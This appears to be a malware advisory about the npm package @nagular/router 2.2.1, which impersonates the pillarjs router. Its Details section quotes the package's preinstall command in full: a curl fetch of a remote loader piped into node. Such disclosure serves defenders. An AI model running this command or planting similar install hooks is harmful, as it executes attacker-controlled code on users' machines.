Vulnerability MAL-2026-17500

Unknown
UNKNOWN RISK
Vulnerabilities without an assigned CVSS score. Severity is not determinable from available data.
2 days ago
October 03, 2026 at 07:23 AM UTC
Malicious code in @nagular/router (npm)
2.2.1
2.2.1

Summary

Malicious code in @nagular/router (npm)

Details

@nagular/[email protected] impersonates router (it copies the code and metadata of the pillarjs router package) and adds a preinstall script that runs on npm install and pipes a remotely hosted loader into node: curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node. This runs attacker-controlled JavaScript with the installing user's privileges. The npm account angularr published @nagular/router and 5 similar packages on 2026-10-03 between 06:33 and 07:23 UTC, all with the same preinstall script.

Impacted packages

Timeline

Published
2 days ago
October 03, 2026 at 07:23 AM UTC
Last Modified
1 hour ago
October 05, 2026 at 11:00 PM UTC